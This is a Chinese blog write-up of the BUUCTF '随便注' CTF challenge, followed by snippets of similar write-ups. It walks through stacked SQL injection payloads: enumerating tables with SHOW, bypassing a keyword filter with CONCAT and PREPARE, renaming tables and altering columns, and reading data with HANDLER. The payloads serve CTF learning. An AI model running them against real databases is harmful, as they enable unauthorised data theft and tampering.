buuctf web 随便注

最新推荐文章于 2023-06-28 11:28:30 发布
最新推荐文章于 2023-06-28 11:28:30 发布
阅读量428 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/119513224
版权

这题注入点很好找,跟之前easy sql一样
先1’直接回显,找到注入点
于是常用思路1’ union select 1,2#
把过滤字符都返回出来了
return preg_match("/select|update|delete|drop|insert|where|./i",$inject);
下面就是sql(mysql)知识时间
show语句没有过滤,所以可以开始

-1';show databases;
-1';show tables;
-1';show columns from `1919810931114514`;

现在很明显了,我们需要从1919810931114514这个表里拿到flag
于是需要查找select过滤的绕过方式
1

.-1';
Set @sql=CONCAT('se','lect * from `1919810931114514`;');
Prepare stmt from @sql;
execute stmt;

利用concat+预处理机制来绕过select过滤,就是在sql执行的时候才拼接出select,而过滤的时候,过滤函数看到的是se
和lect两个字符串
2.由于alter名又被禁用,所以可以通过更改表的方式来间接绕过

-1';
rename table `words` to `test`;
rename table `1919810931114514` to `words`;
alter table `words` change `flag` `id` varchar(100);

修改后payload:-1’ or ‘1’='1
3.mysql自带handler函数

1';
handler `words` open;
handler `words` read first;

(我之前方法2改过数据库,如果直接用handler函数,那么把words换成1919…)
参考视频链接:https://www.bilibili.com/video/BV1eg411L7BN/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BUUCTF-Web-随便-wp
single7_的博客
12-14 351
0x01 知识点 SQL入-堆叠入 sql预处理语句 巧用contact()函数绕过 0x02 知识铺垫 在SQL中,分号(;)是用来表示一条sql语句的结束。在分号(;)结束一个sql语句后继续构造下一条语句,而后根据结果判断两条甚至多条SQL语句会不会一起执行?这种入方式称为堆叠入。 union injection(联合入)是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠入可以执行的是任意的语
BUUCTF web随便
good good study
11-21 2176
启动靶场访问如下,输入1',报错,可知是字符型入,变量由单引号包裹输入1' and 1=1 --+,显示正常先直接用sqlmap入一下,显示存在入,但是始终入不出来数据库,“[ERROR] unable to retrieve the number of databases”,猜想应该是存在字符过滤因为现在还不知道是什么原因导致的sqlmap入不出来,所以先尝试手。输入框中输入1和2显示的结果不同,像这种直接回显输入的最先尝试联合入。
BUUCTF-web-随便
nareku的博客
07-06 1139
输入1试试,可以看到是GET传参 判断一下是数字型入还是字符型入 可以看出来是字符型入了,接下来就是常规猜解SQL查询语句中的字段数输入 : 1' order by 1# 输入: 1' order by 2#输入: 1' order by 3# 说明字段数为2 常规使用联合查询输入: 1' union select 1,2# 发现一些常用的查询关键词都被过滤了捏,但是堆叠查询入貌似没有,试试堆叠查询入输入: 1' ; show databases;#说明堆叠查询入可行输入: -1' ;
BUUCTF WEB 随便
guishengyx的博客
10-18 170
题目是入,于是尝试SQL入 order by 2得到两个字段 尝试联合查询时发现禁用了select 百度了解到堆叠查询 用;将语句隔开 发现可以使用堆叠入 继续查询表名 查询表中的字段名 0';show columns from words;-- qwe 查询1919810931114514表的时候出现了问题 百度了解到数字表名需要用反引号``括起来 0';show columns from `1919810931114514`;-- asd ...
BUUCTFWeb随便(SQL入)
qq_70434663的博客
03-02 498
但是因为表过滤了select,所以使用rename先把words表改为其它的表名,在把1919810931114514表改为words表,给新的words表添加新的列名id,最后将flag改名为data。猜测是SQL入,我们随便输入1'(单引号为英文状态下输入)发现报错提示表明此为单引号的SQL入。第一步,测试入点(利用引号,and 1=1 ,or 1=1之类的判断是字符型还是数字型)我们发现在1919810931114514表里面爆出了flag字段,猜测flag就在里面。接下来,爆出两张表的内容。
BUUCTFweb之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
BUUCTF部分web题目
最新发布
05-06
写题记录
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
Buuctf-Web-[强网杯 2019]随便
御七彩虹猫
05-13 245
Buuctf-Web-[强网杯 2019]随便
BUUCTF web 随便
H4ppyD0g的博客
09-19 750
堆叠入 在SQL中,分号是用来表示一条sql语句的结束。如果在 ; 结束一个sql语句后继续构造下一条语句,效果就是分别执行两条sql语句。由于两条语句堆叠在同一行,而不是原本应该各自占据一行,所以这种入成为堆叠入。 意1 当数字型字符作为字段、表、库名查询时,应该用反单引号括起来 输入 1 没有报错 1' 报错,证明存在入 1' # 没有报错 1' orde...
【Writeup】BUUCTF_Web_随便
BAKUMANSEC - Just Do It
08-14 4442
【Writeup】BUUCTF_Web_随便 0x01 解题思路 打开页面,显然考点是SQL入: 手工测试一下: ​ ​ ?inject=' ​ ​ ?inject=' or 1# ​ ​ ?inject=' or 0# 可以进行基于布尔的盲释里有这么一句话: 先用sqlmap常规扫描试试: sqlmap identified the following in...
BUUCTF Web [强网杯 2019]随便
热门推荐
wangyuxiang946的博客
10-25 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [强网杯 2019]随便一、题目简介二、思路分析1)判断入点2)选择入方式3)查看表中内容三、解题步骤1)获取表2)获取字段3)获取表中数据四、总结 一、题目简介 进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。 在输入框中输入一个2,即可.
buuctf-web-[强网杯 2019]随便-wp
居上
06-22 1260
[强网杯 2019]随便 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
BUUCTF-[强网杯 2019]随便
rumil的博客
06-28 147
首先,正常是查words表的数据,我们先将words表重命名成别的,名字任意。查看表的字段信息,发现flag,但是我们没有办法查看flag的内容,我们再看看words表中的数据字段。表改名,改为words,将flag字段改为id,然后在使用万能钥匙爆数据。观察发现,我们查出来的数据,可能就是words表当中的数据,我们可以将。意:表名如为数字时候,使用``引用,否则不能正常查看信息。输入3报错,将3换成2,若不报错,则说明该表有2列字段。最后,使用万能钥匙,爆表的数据。正常的提交数据,可查询出信息。
buucrf-web-随便
weixin_43345082的博客
08-16 974
又学到个姿势 这道题是sql堆叠入 堆叠入自行百度 同时有过滤 做法是使用mysql预定义语句 PREPARE stmt from '你的sql语句'; EXECUTE stmt (如果sql有参数的话, USING xxx,xxx); // 这里USING的只能是会话变量 DEALLOCATE PREPARE stmt; 这三句话分别就是: 预定义好sql语句 执行预定义的sql 释放...
BugkuCTF sql
weixin_34413065的博客
05-04 290
前言 写了这么久的web题,算是把它基础部分都刷完了一遍,以下的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每道题的题解都以单独一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~ 点开链接一看 很明显可以看出查询key表,id=1的string字段 我们去构造payload: http://103.238.227.13:10083/inde...
BUUCTF——随便
weixin_45864041的博客
09-21 741
看到题目我们先试着正常查询 当上传的数据被直接显示在了URL中,很有可能这里存在sql入漏洞,接下来,我们可以对猜想进行验证。 通过上面的验证,我们可以直到这里存在sql入漏洞,并且传递的参数被单引号包裹 从上面可以看到,这里过滤了一些字符,导致我们不能用联合查找的方式进行入,所以我们换一个思路,看一看是否可以进行堆叠入 通过上面的测试可以看到,可以进行堆叠入。 先查表。 查列名,在这里可以看到数字这张表里有flag。 但是select被过滤了,我们无法得到fl..
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值